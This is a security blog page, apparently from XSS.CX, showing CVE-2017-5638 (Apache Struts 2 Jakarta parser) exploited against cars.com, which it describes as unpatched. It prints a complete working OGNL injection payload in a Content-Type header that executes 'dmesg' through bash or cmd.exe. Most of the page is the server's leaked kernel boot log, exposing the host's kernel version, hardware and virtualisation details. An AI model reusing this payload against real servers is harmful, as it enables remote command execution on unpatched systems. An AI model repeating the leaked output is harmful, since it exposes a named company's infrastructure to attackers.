XSS.CX Home | Blog | XSS Filter Evasion

CVE-2017-5638, cars.com, Unpatched, PoC, Example

TL;DR The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 mishandles file upload, which allows remote attackers to execute arbitrary commands via a #cmd= string in a crafted Content-Type HTTP header, as shown below.

Comment: 3 Months after this Bug was published, cars.com still hadn't patched.

Sample Date: March, 10, 2016
Target URL High Medium Low Info
cars.com1000

CVE-2017-5638, cars.com, Exploit, PoC, Example, dmesg
Alert Detail Click here to hide all alerts

Hide the alert
REQUEST
========
GET /for-sale/savedSearch/searches.json HTTP/1.1
Host: www.cars.com
Connection: close
Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='dmesg').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Accept: */*
User-Agent: Mozilla/5.0


RESPONSE
========
HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
X-UA-Compatible: IE=edge
Date: Mon, 22 May 2017 11:00:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Language: en-US
Content-Length: 96367

Initializing cgroup subsys cpuset
Initializing cgroup subsys cpu
Linux version 2.6.32-220.el6.x86_64 (mockbuild@x86-004.build.bos.redhat.com) (gcc version 4.4.5 20110214 (Red Hat 4.4.5-6) (GCC) ) #1 SMP Wed Nov 9 08:03:13 EST 2011
Command line: ro root=/dev/mapper/rootvg-rootlv rd_NO_LUKS rd_LVM_LV=rootvg/rootlv LANG=en_US.UTF-8 rd_NO_MD quiet rd_LVM_LV=rootvg/swaplv SYSFONT=latarcyrheb-sun16 rhgb crashkernel=auto  rhgb crashkernel=auto quiet  KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM
KERNEL supported cpus:
  Intel GenuineIntel
  AMD AuthenticAMD
  Centaur CentaurHauls
Disabled fast string operations
BIOS-provided physical RAM map:
 BIOS-e820: 0000000000000000 - 000000000009f400 (usable)
 BIOS-e820: 000000000009f400 - 00000000000a0000 (reserved)
 BIOS-e820: 00000000000ca000 - 00000000000cc000 (reserved)
 BIOS-e820: 00000000000dc000 - 0000000000100000 (reserved)
 BIOS-e820: 0000000000100000 - 00000000bfee0000 (usable)
 BIOS-e820: 00000000bfee0000 - 00000000bfeff000 (ACPI data)
 BIOS-e820: 00000000bfeff000 - 00000000bff00000 (ACPI NVS)
 BIOS-e820: 00000000bff00000 - 00000000c0000000 (usable)
 BIOS-e820: 00000000f0000000 - 00000000f8000000 (reserved)
 BIOS-e820: 00000000fec00000 - 00000000fec10000 (reserved)
 BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved)
 BIOS-e820: 00000000fffe0000 - 0000000100000000 (reserved)
 BIOS-e820: 0000000100000000 - 0000001040000000 (usable)
DMI present.
SMBIOS version 2.4 @ 0xF6B30
DMI: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/14/2014
Phoenix BIOS detected: BIOS may corrupt low RAM, working around it.
e820 update range: 0000000000000000 - 0000000000010000 (usable) ==> (reserved)
e820 update range: 0000000000000000 - 0000000000001000 (usable) ==> (reserved)
e820 remove range: 00000000000a0000 - 0000000000100000 (usable)
last_pfn = 0x1040000 max_arch_pfn = 0x400000000
MTRR default type: uncachable
MTRR fixed ranges enabled:
  00000-9FFFF write-back
  A0000-BFFFF uncachable
  C0000-CBFFF write-protect
  CC000-EFFFF uncachable
  F0000-FFFFF write-protect
MTRR variable ranges enabled:
  0 base 00C0000000 mask FFC0000000 uncachable
  1 base 0000000000 mask F000000000 write-back
  2 base 1000000000 mask FFC0000000 write-back
  3 disabled
  4 disabled
  5 disabled
  6 disabled
  7 disabled
x86 PAT enabled: cpu 0, old 0x0, new 0x7010600070106
original variable MTRRs
reg 0, base: 3GB, range: 1GB, type UC
reg 1, base: 0GB, range: 64GB, type WB
reg 2, base: 64GB, range: 1GB, type WB
total RAM covered: 65536M
Found optimal setting for mtrr clean up
 gran_size: 64K 	chunk_size: 64K 	num_reg: 7  	lose cover RAM: 0G
New variable MTRRs
reg 0, base: 0GB, range: 2GB, type WB
reg 1, base: 2GB, range: 1GB, type WB
reg 2, base: 4GB, range: 4GB, type WB
reg 3, base: 8GB, range: 8GB, type WB
reg 4, base: 16GB, range: 16GB, type WB
reg 5, base: 32GB, range: 32GB, type WB
reg 6, base: 64GB, range: 1GB, type WB
x86 PAT enabled: cpu 0, old 0x0, new 0x7010600070106
e820 update range: 00000000c0000000 - 0000000100000000 (usable) ==> (reserved)
last_pfn = 0xc0000 max_arch_pfn = 0x400000000
initial memory mapped : 0 - 20000000
init_memory_mapping: 0000000000000000-00000000c0000000
 0000000000 - 00c0000000 page 2M
kernel direct mapping tables up to c0000000 @ 10000-14000
init_memory_mapping: 0000000100000000-0000001040000000
 0100000000 - 1040000000 page 2M
kernel direct mapping tables up to 1040000000 @ 12000-54000
RAMDISK: 370c6000 - 37fef1c2
ACPI: RSDP 00000000000f6b80 00024 (v02 PTLTD )
ACPI: XSDT 00000000bfee190a 0005C (v01 INTEL  440BX    06040000 VMW  01324272)
ACPI: FACP 00000000bfefee73 000F4 (v04 INTEL  440BX    06040000 PTL  000F4240)
ACPI: DSDT 00000000bfee1f8c 1CEE7 (v01 PTLTD  Custom   06040000 MSFT 03000001)
ACPI: FACS 00000000bfefffc0 00040
ACPI: BOOT 00000000bfee1f64 00028 (v01 PTLTD  $SBFTBL$ 06040000  LTP 00000001)
ACPI: APIC 00000000bfee1d62 00202 (v01 PTLTD  ? APIC   06040000  LTP 00000000)
ACPI: MCFG 00000000bfee1d26 0003C (v01 PTLTD  $PCITBL$ 06040000  LTP 00000001)
ACPI: SRAT 00000000bfee1a06 00320 (v02 VMWARE MEMPLUG  06040000 VMW  00000001)
ACPI: HPET 00000000bfee19ce 00038 (v01 VMWARE VMW HPET 06040000 VMW  00000001)
ACPI: WAET 00000000bfee19a6 00028 (v01 VMWARE VMW WAET 06040000 VMW  00000001)
ACPI: Local APIC address 0xfee00000
system APIC only can use physical flat
Setting APIC routing to physical flat.
SRAT: PXM 0 -> APIC 0 -> Node 0
SRAT: PXM 0 -> APIC 1 -> Node 0
SRAT: PXM 0 -> APIC 2 -> Node 0
SRAT: PXM 0 -> APIC 3 -> Node 0
SRAT: PXM 0 -> APIC 4 -> Node 0
SRAT: PXM 0 -> APIC 5 -> Node 0
SRAT: PXM 0 -> APIC 6 -> Node 0
SRAT: PXM 0 -> APIC 7 -> Node 0
SRAT: PXM 0 -> APIC 8 -> Node 0
SRAT: PXM 0 -> APIC 9 -> Node 0
SRAT: PXM 0 -> APIC 10 -> Node 0
SRAT: PXM 0 -> APIC 11 -> Node 0
SRAT: PXM 0 -> APIC 12 -> Node 0
SRAT: PXM 0 -> APIC 13 -> Node 0
SRAT: PXM 0 -> APIC 14 -> Node 0
SRAT: PXM 0 -> APIC 15 -> Node 0
SRAT: PXM 0 -> APIC 16 -> Node 0
SRAT: PXM 0 -> APIC 17 -> Node 0
SRAT: PXM 0 -> APIC 18 -> Node 0
SRAT: PXM 0 -> APIC 19 -> Node 0
SRAT: PXM 0 -> APIC 20 -> Node 0
SRAT: PXM 0 -> APIC 21 -> Node 0
SRAT: PXM 0 -> APIC 22 -> Node 0
SRAT: PXM 0 -> APIC 23 -> Node 0
SRAT: PXM 0 -> APIC 24 -> Node 0
SRAT: PXM 0 -> APIC 25 -> Node 0
SRAT: PXM 0 -> APIC 26 -> Node 0
SRAT: PXM 0 -> APIC 27 -> Node 0
SRAT: PXM 0 -> APIC 28 -> Node 0
SRAT: PXM 0 -> APIC 29 -> Node 0
SRAT: PXM 0 -> APIC 30 -> Node 0
SRAT: PXM 0 -> APIC 31 -> Node 0
SRAT: Node 0 PXM 0 0-a0000
SRAT: Node 0 PXM 0 100000-10000000
SRAT: Node 0 PXM 0 10000000-c0000000
SRAT: Node 0 PXM 0 100000000-840000000
SRAT: Node 1 PXM 1 840000000-1040000000
SRAT: Node 1 PXM 1 1040000000-fd00000000
SRAT: hot plug zone found 1040000000 - fd00000000
NUMA: Allocated memnodemap from 100000 - 2fa040
NUMA: Using 20 for the hash shift.
Bootmem setup node 0 0000000000000000-0000000840000000
  NODE_DATA [000000000004f000 - 0000000000082fff]
  bootmap [00000000002fb000 -  0000000000402fff] pages 108
(9 early reservations) ==> bootmem [0000000000 - 0840000000]
  #0 [0000000000 - 0000001000]   BIOS data page ==> [0000000000 - 0000001000]
  #1 [0000006000 - 0000008000]       TRAMPOLINE ==> [0000006000 - 0000008000]
  #2 [0001000000 - 000200c7e4]    TEXT DATA BSS ==> [0001000000 - 000200c7e4]
  #3 [00370c6000 - 0037fef1c2]          RAMDISK ==> [00370c6000 - 0037fef1c2]
  #4 [000009f400 - 0000100000]    BIOS reserved ==> [000009f400 - 0000100000]
  #5 [000200d000 - 000200d1f0]              BRK ==> [000200d000 - 000200d1f0]
  #6 [0000010000 - 0000012000]          PGTABLE ==> [0000010000 - 0000012000]
  #7 [0000012000 - 000004f000]          PGTABLE ==> [0000012000 - 000004f000]
  #8 [0000100000 - 00002fa040]       MEMNODEMAP ==> [0000100000 - 00002fa040]
Bootmem setup node 1 0000000840000000-0000001040000000
  NODE_DATA [0000000840000040 - 000000084003403f]
  bootmap [0000000840035000 -  0000000840134fff] pages 100
(9 early reservations) ==> bootmem [0840000000 - 1040000000]
  #0 [0000000000 - 0000001000]   BIOS data page
  #1 [0000006000 - 0000008000]       TRAMPOLINE
  #2 [0001000000 - 000200c7e4]    TEXT DATA BSS
  #3 [00370c6000 - 0037fef1c2]          RAMDISK
  #4 [000009f400 - 0000100000]    BIOS reserved
  #5 [000200d000 - 000200d1f0]              BRK
  #6 [0000010000 - 0000012000]          PGTABLE
  #7 [0000012000 - 000004f000]          PGTABLE
  #8 [0000100000 - 00002fa040]       MEMNODEMAP
found SMP MP-table at [ffff8800000f6bf0] f6bf0
Reserving 133MB of memory at 48MB for crashkernel (System RAM: 66560MB)
 [ffffea0000000000-ffffea000f7fffff] PMD -> [ffff880028600000-ffff880036ffffff] on node 0
 [ffffea000f800000-ffffea001cdfffff] PMD -> [ffff880038000000-ffff8800455fffff] on node 0
 [ffffea001ce00000-ffffea0038dfffff] PMD -> [ffff880840200000-ffff88085c1fffff] on node 1
Zone PFN ranges:
  DMA      0x00000010 -> 0x00001000
  DMA32    0x00001000 -> 0x00100000
  Normal   0x00100000 -> 0x01040000
Movable zone start PFN for each node
early_node_map[5] active PFN ranges
    0: 0x00000010 -> 0x0000009f
    0: 0x00000100 -> 0x000bfee0
    0: 0x000bff00 -> 0x000c0000
    0: 0x00100000 -> 0x00840000
    1: 0x00840000 -> 0x01040000
On node 0 totalpages: 8388463
  DMA zone: 56 pages used for memmap
  DMA zone: 668 pages reserved
  DMA zone: 3259 pages, LIFO batch:0
  DMA32 zone: 14280 pages used for memmap
  DMA32 zone: 768024 pages, LIFO batch:31
  Normal zone: 103936 pages used for memmap
  Normal zone: 7498240 pages, LIFO batch:31
On node 1 totalpages: 8388608
  Normal zone: 114688 pages used for memmap
  Normal zone: 8273920 pages, LIFO batch:31
ACPI: PM-Timer IO Port: 0x1008
ACPI: Local APIC address 0xfee00000
system APIC only can use physical flat
Setting APIC routing to physical flat.
ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
ACPI: LAPIC (acpi_id[0x01] lapic_id[0x01] enabled)
ACPI: LAPIC (acpi_id[0x02] lapic_id[0x02] enabled)
ACPI: LAPIC (acpi_id[0x03] lapic_id[0x03] enabled)
ACPI: LAPIC (acpi_id[0x04] lapic_id[0x04] enabled)
ACPI: LAPIC (acpi_id[0x05] lapic_id[0x05] enabled)
ACPI: LAPIC (acpi_id[0x06] lapic_id[0x06] enabled)
ACPI: LAPIC (acpi_id[0x07] lapic_id[0x07] enabled)
ACPI: LAPIC (acpi_id[0x08] lapic_id[0x08] enabled)
ACPI: LAPIC (acpi_id[0x09] lapic_id[0x09] enabled)
ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x0a] enabled)
ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x0b] enabled)
ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x0c] enabled)
ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x0d] enabled)
ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x0e] enabled)
ACPI: LAPIC (acpi_id[0x0f] lapic_id[0x0f] enabled)
ACPI: LAPIC (acpi_id[0x10] lapic_id[0x10] disabled)
ACPI: LAPIC (acpi_id[0x11] lapic_id[0x11] disabled)
ACPI: LAPIC (acpi_id[0x12] lapic_id[0x12] disabled)
ACPI: LAPIC (acpi_id[0x13] lapic_id[0x13] disabled)
ACPI: LAPIC (acpi_id[0x14] lapic_id[0x14] disabled)
ACPI: LAPIC (acpi_id[0x15] lapic_id[0x15] disabled)
ACPI: LAPIC (acpi_id[0x16] lapic_id[0x16] disabled)
ACPI: LAPIC (acpi_id[0x17] lapic_id[0x17] disabled)
ACPI: LAPIC (acpi_id[0x18] lapic_id[0x18] disabled)
ACPI: LAPIC (acpi_id[0x19] lapic_id[0x19] disabled)
ACPI: LAPIC (acpi_id[0x1a] lapic_id[0x1a] disabled)
ACPI: LAPIC (acpi_id[0x1b] lapic_id[0x1b] disabled)
ACPI: LAPIC (acpi_id[0x1c] lapic_id[0x1c] disabled)
ACPI: LAPIC (acpi_id[0x1d] lapic_id[0x1d] disabled)
ACPI: LAPIC (acpi_id[0x1e] lapic_id[0x1e] disabled)
ACPI: LAPIC (acpi_id[0x1f] lapic_id[0x1f] disabled)
ACPI: LAPIC_NMI (acpi_id[0x00] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x01] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x02] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x03] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x04] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x05] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x06] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x07] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x08] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x09] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x0a] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x0b] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x0c] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x0d] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x0e] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x0f] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x10] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x11] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x12] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x13] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x14] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x15] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x16] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x17] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x18] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x19] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x1a] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x1b] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x1c] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x1d] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x1e] high edge lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x1f] high edge lint[0x1])
ACPI: IOAPIC (id[0x20] address[0xfec00000] gsi_base[0])
IOAPIC[0]: apic_id 32, version 17, address 0xfec00000, GSI 0-23
ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 high edge)
ACPI: IRQ0 used by override.
ACPI: IRQ2 used by override.
ACPI: IRQ9 used by override.
Using ACPI (MADT) for SMP configuration information
ACPI: HPET id: 0x8086af01 base: 0xfed00000
SMP: Allowing 32 CPUs, 16 hotplug CPUs
nr_irqs_gsi: 24
PM: Registered nosave memory: 000000000009f000 - 00000000000a0000
PM: Registered nosave memory: 00000000000a0000 - 00000000000ca000
PM: Registered nosave memory: 00000000000ca000 - 00000000000cc000
PM: Registered nosave memory: 00000000000cc000 - 00000000000dc000
PM: Registered nosave memory: 00000000000dc000 - 0000000000100000
PM: Registered nosave memory: 00000000bfee0000 - 00000000bfeff000
PM: Registered nosave memory: 00000000bfeff000 - 00000000bff00000
PM: Registered nosave memory: 00000000c0000000 - 00000000f0000000
PM: Registered nosave memory: 00000000f0000000 - 00000000f8000000
PM: Registered nosave memory: 00000000f8000000 - 00000000fec00000
PM: Registered nosave memory: 00000000fec00000 - 00000000fec10000
PM: Registered nosave memory: 00000000fec10000 - 00000000fee00000
PM: Registered nosave memory: 00000000fee00000 - 00000000fee01000
PM: Registered nosave memory: 00000000fee01000 - 00000000fffe0000
PM: Registered nosave memory: 00000000fffe0000 - 0000000100000000
Allocating PCI resources starting at c0000000 (gap: c0000000:30000000)
Booting paravirtualized kernel on bare hardware
NR_CPUS:4096 nr_cpumask_bits:32 nr_cpu_ids:32 nr_node_ids:2
PERCPU: Embedded 30 pages/cpu @ffff880045600000 s92696 r8192 d21992 u262144
pcpu-alloc: s92696 r8192 d21992 u262144 alloc=1*2097152
pcpu-alloc: [0] 00 01 02 03 04 05 06 07 [0] 08 09 10 11 12 13 14 15 
pcpu-alloc: [0] 16 18 20 22 24 26 28 30 [1] 17 19 21 23 25 27 29 31 
Built 2 zonelists in Zone order, mobility grouping on.  Total pages: 16543443
Policy zone: Normal
Kernel command line: ro root=/dev/mapper/rootvg-rootlv rd_NO_LUKS rd_LVM_LV=rootvg/rootlv LANG=en_US.UTF-8 rd_NO_MD quiet rd_LVM_LV=rootvg/swaplv SYSFONT=latarcyrheb-sun16 rhgb crashkernel=auto  rhgb crashkernel=133M@0M quiet  KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM
PID hash table entries: 4096 (order: 3, 32768 bytes)
xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
Checking aperture...
No AGP bridge found
PCI-DMA: Using software bounce buffering for IO (SWIOTLB)
Placing 64MB software IO TLB between ffff880020000000 - ffff880024000000
software IO TLB at phys 0x20000000 - 0x24000000
Memory: 65949612k/68157440k available (5084k kernel code, 1049156k absent, 1158672k reserved, 7229k data, 1244k init)
Hierarchical RCU implementation.
NR_IRQS:33024 nr_irqs:664
Extended CMOS year: 2000
Console: colour VGA+ 80x25
console [tty0] enabled
allocated 536870912 bytes of page_cgroup
please try 'cgroup_disable=memory' option if you don't want memory cgroups
hpet clockevent registered
HPET: 16 timers in total, 0 timers will be used for per-cpu timer
TSC freq read from hypervisor : 2699.999 MHz
Detected 2699.999 MHz processor.
Calibrating delay loop (skipped) preset value.. 5399.99 BogoMIPS (lpj=2699999)
pid_max: default: 32768 minimum: 301
Security Framework initialized
SELinux:  Initializing.
SELinux:  Starting in permissive mode
Dentry cache hash table entries: 8388608 (order: 14, 67108864 bytes)
Inode-cache hash table entries: 4194304 (order: 13, 33554432 bytes)
Mount-cache hash table entries: 256
Initializing cgroup subsys ns
Initializing cgroup subsys cpuacct
Initializing cgroup subsys memory
Initializing cgroup subsys devices
Initializing cgroup subsys freezer
Initializing cgroup subsys net_cls
Initializing cgroup subsys blkio
Initializing cgroup subsys perf_event
Disabled fast string operations
CPU: Physical Processor ID: 0
mce: CPU supports 0 MCE banks
alternatives: switching to unfair spinlock
ACPI: Core revision 20090903
ftrace: converting mcount calls to 0f 1f 44 00 00
ftrace: allocating 20776 entries in 82 pages
Setting APIC routing to physical flat
..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1
CPU0: Intel(R) Xeon(R) CPU E5-2680 0 @ 2.70GHz stepping 02
Performance Events: SandyBridge events, core PMU driver.
... version:                1
... bit width:              48
... generic registers:      4
... value mask:             0000ffffffffffff
... max period:             000000007fffffff
... fixed-purpose events:   0
... event mask:             000000000000000f
NMI watchdog enabled, takes one hw-pmu counter.
Booting Node   0, Processors  #1
Disabled fast string operations
mce: CPU supports 0 MCE banks
 #2
Disabled fast string operations
mce: CPU supports 0 MCE banks
 #3
Disabled fast string operations
mce: CPU supports 0 MCE banks
 #4
Disabled fast string operations
mce: CPU supports 0 MCE banks
 #5
Disabled fast string operations
mce: CPU supports 0 MCE banks
 #6
Disabled fast string operations
mce: CPU supports 0 MCE banks
 #7
Disabled fast string operations
mce: CPU supports 0 MCE banks
 #8
Disabled fast string operations
mce: CPU supports 0 MCE banks
 #9
Disabled fast string operations
mce: CPU supports 0 MCE banks
 #10
Disabled fast string operations
mce: CPU supports 0 MCE banks
 #11
Disabled fast string operations
mce: CPU supports 0 MCE banks
 #12
Disabled fast string operations
mce: CPU supports 0 MCE banks
 #13
Disabled fast string operations
mce: CPU supports 0 MCE banks
 #14
Disabled fast string operations
mce: CPU supports 0 MCE banks
 #15
Disabled fast string operations
mce: CPU supports 0 MCE banks
Brought up 16 CPUs
Total of 16 processors activated (86399.96 BogoMIPS).
x86 PAT enabled: cpu 14, old 0x0, new 0x7010600070106
x86 PAT enabled: cpu 7, old 0x0, new 0x7010600070106
x86 PAT enabled: cpu 1, old 0x0, new 0x7010600070106
x86 PAT enabled: cpu 3, old 0x0, new 0x7010600070106
x86 PAT enabled: cpu 2, old 0x0, new 0x7010600070106
x86 PAT enabled: cpu 6, old 0x0, new 0x7010600070106
x86 PAT enabled: cpu 4, old 0x0, new 0x7010600070106
x86 PAT enabled: cpu 5, old 0x0, new 0x7010600070106
x86 PAT enabled: cpu 10, old 0x0, new 0x7010600070106
x86 PAT enabled: cpu 9, old 0x0, new 0x7010600070106
x86 PAT enabled: cpu 13, old 0x0, new 0x7010600070106
x86 PAT enabled: cpu 15, old 0x0, new 0x7010600070106
x86 PAT enabled: cpu 12, old 0x0, new 0x7010600070106
x86 PAT enabled: cpu 11, old 0x0, new 0x7010600070106
x86 PAT enabled: cpu 8, old 0x0, new 0x7010600070106
sizeof(vma)=200 bytes
sizeof(page)=56 bytes
sizeof(inode)=592 bytes
sizeof(dentry)=192 bytes
sizeof(ext3inode)=800 bytes
sizeof(buffer_head)=104 bytes
sizeof(skbuff)=232 bytes
sizeof(task_struct)=2616 bytes
devtmpfs: initialized
regulator: core version 0.5
NET: Registered protocol family 16
ACPI: bus type pci registered
PCI: MCFG configuration 0: base f0000000 segment 0 buses 0 - 127
PCI: MCFG area at f0000000 reserved in E820
PCI: Using MMCONFIG at f0000000 - f7ffffff
PCI: Using configuration type 1 for base access
bio: create slab  at 0
ACPI: EC: Look up EC in DSDT
ACPI: BIOS _OSI(Linux) query ignored
ACPI: Interpreter enabled
ACPI: (supports S0 S1 S4 S5)
ACPI: Using IOAPIC for interrupt routing
ACPI: No dock devices found.
HEST: Table not found.
ACPI: PCI Root Bridge [PCI0] (0000:00)
pci 0000:00:07.1: reg 20 io port: [0x1060-0x106f]
pci 0000:00:07.3: quirk: region 1000-103f claimed by PIIX4 ACPI
pci 0000:00:07.3: quirk: region 1040-104f claimed by PIIX4 SMB
pci 0000:00:07.7: reg 10 io port: [0x1080-0x10bf]
pci 0000:00:07.7: reg 14 64bit mmio: [0xfebfe000-0xfebfffff]
pci 0000:00:0f.0: reg 10 io port: [0x1070-0x107f]
pci 0000:00:0f.0: reg 14 32bit mmio pref: [0xec000000-0xefffffff]
pci 0000:00:0f.0: reg 18 32bit mmio: [0xfe000000-0xfe7fffff]
pci 0000:00:0f.0: reg 30 32bit mmio pref: [0x000000-0x007fff]
pci 0000:00:15.0: PME# supported from D0 D3hot D3cold
pci 0000:00:15.0: PME# disabled
pci 0000:00:15.1: PME# supported from D0 D3hot D3cold
pci 0000:00:15.1: PME# disabled
pci 0000:00:15.2: PME# supported from D0 D3hot D3cold
pci 0000:00:15.2: PME# disabled
pci 0000:00:15.3: PME# supported from D0 D3hot D3cold
pci 0000:00:15.3: PME# disabled
pci 0000:00:15.4: PME# supported from D0 D3hot D3cold
pci 0000:00:15.4: PME# disabled
pci 0000:00:15.5: PME# supported from D0 D3hot D3cold
pci 0000:00:15.5: PME# disabled
pci 0000:00:15.6: PME# supported from D0 D3hot D3cold
pci 0000:00:15.6: PME# disabled
pci 0000:00:15.7: PME# supported from D0 D3hot D3cold
pci 0000:00:15.7: PME# disabled
pci 0000:00:16.0: PME# supported from D0 D3hot D3cold
pci 0000:00:16.0: PME# disabled
pci 0000:00:16.1: PME# supported from D0 D3hot D3cold
pci 0000:00:16.1: PME# disabled
pci 0000:00:16.2: PME# supported from D0 D3hot D3cold
pci 0000:00:16.2: PME# disabled
pci 0000:00:16.3: PME# supported from D0 D3hot D3cold
pci 0000:00:16.3: PME# disabled
pci 0000:00:16.4: PME# supported from D0 D3hot D3cold
pci 0000:00:16.4: PME# disabled
pci 0000:00:16.5: PME# supported from D0 D3hot D3cold
pci 0000:00:16.5: PME# disabled
pci 0000:00:16.6: PME# supported from D0 D3hot D3cold
pci 0000:00:16.6: PME# disabled
pci 0000:00:16.7: PME# supported from D0 D3hot D3cold
pci 0000:00:16.7: PME# disabled
pci 0000:00:17.0: PME# supported from D0 D3hot D3cold
pci 0000:00:17.0: PME# disabled
pci 0000:00:17.1: PME# supported from D0 D3hot D3cold
pci 0000:00:17.1: PME# disabled
pci 0000:00:17.2: PME# supported from D0 D3hot D3cold
pci 0000:00:17.2: PME# disabled
pci 0000:00:17.3: PME# supported from D0 D3hot D3cold
pci 0000:00:17.3: PME# disabled
pci 0000:00:17.4: PME# supported from D0 D3hot D3cold
pci 0000:00:17.4: PME# disabled
pci 0000:00:17.5: PME# supported from D0 D3hot D3cold
pci 0000:00:17.5: PME# disabled
pci 0000:00:17.6: PME# supported from D0 D3hot D3cold
pci 0000:00:17.6: PME# disabled
pci 0000:00:17.7: PME# supported from D0 D3hot D3cold
pci 0000:00:17.7: PME# disabled
pci 0000:00:18.0: PME# supported from D0 D3hot D3cold
pci 0000:00:18.0: PME# disabled
pci 0000:00:18.1: PME# supported from D0 D3hot D3cold
pci 0000:00:18.1: PME# disabled
pci 0000:00:18.2: PME# supported from D0 D3hot D3cold
pci 0000:00:18.2: PME# disabled
pci 0000:00:18.3: PME# supported from D0 D3hot D3cold
pci 0000:00:18.3: PME# disabled
pci 0000:00:18.4: PME# supported from D0 D3hot D3cold
pci 0000:00:18.4: PME# disabled
pci 0000:00:18.5: PME# supported from D0 D3hot D3cold
pci 0000:00:18.5: PME# disabled
pci 0000:00:18.6: PME# supported from D0 D3hot D3cold
pci 0000:00:18.6: PME# disabled
pci 0000:00:18.7: PME# supported from D0 D3hot D3cold
pci 0000:00:18.7: PME# disabled
pci 0000:00:11.0: transparent bridge
pci 0000:00:11.0: bridge io port: [0x2000-0x3fff]
pci 0000:00:11.0: bridge 32bit mmio: [0xfd600000-0xfdffffff]
pci 0000:00:11.0: bridge 64bit mmio pref: [0xebb00000-0xebffffff]
pci 0000:03:00.0: reg 10 io port: [0x4008-0x400f]
pci 0000:03:00.0: reg 14 64bit mmio: [0xfd5f8000-0xfd5fffff]
pci 0000:03:00.0: reg 30 32bit mmio pref: [0x000000-0x00ffff]
pci 0000:03:00.0: PME# supported from D0 D3hot D3cold
pci 0000:03:00.0: PME# disabled
pci 0000:03:00.0: disabling ASPM on pre-1.1 PCIe device.  You can enable it with 'pcie_aspm=force'
pci 0000:00:15.0: bridge io port: [0x4000-0x4fff]
pci 0000:00:15.0: bridge 32bit mmio: [0xfd500000-0xfd5fffff]
pci 0000:00:15.0: bridge 64bit mmio pref: [0xeba00000-0xebafffff]
pci 0000:00:15.1: bridge io port: [0x8000-0x8fff]
pci 0000:00:15.1: bridge 32bit mmio: [0xfd100000-0xfd1fffff]
pci 0000:00:15.1: bridge 64bit mmio pref: [0xeb600000-0xeb6fffff]
pci 0000:00:15.2: bridge io port: [0xc000-0xcfff]
pci 0000:00:15.2: bridge 32bit mmio: [0xfcd00000-0xfcdfffff]
pci 0000:00:15.2: bridge 64bit mmio pref: [0xeb200000-0xeb2fffff]
pci 0000:00:15.3: bridge 32bit mmio: [0xfc900000-0xfc9fffff]
pci 0000:00:15.3: bridge 64bit mmio pref: [0xeae00000-0xeaefffff]
pci 0000:00:15.4: bridge 32bit mmio: [0xfc500000-0xfc5fffff]
pci 0000:00:15.4: bridge 64bit mmio pref: [0xeaa00000-0xeaafffff]
pci 0000:00:15.5: bridge 32bit mmio: [0xfc100000-0xfc1fffff]
pci 0000:00:15.5: bridge 64bit mmio pref: [0xea600000-0xea6fffff]
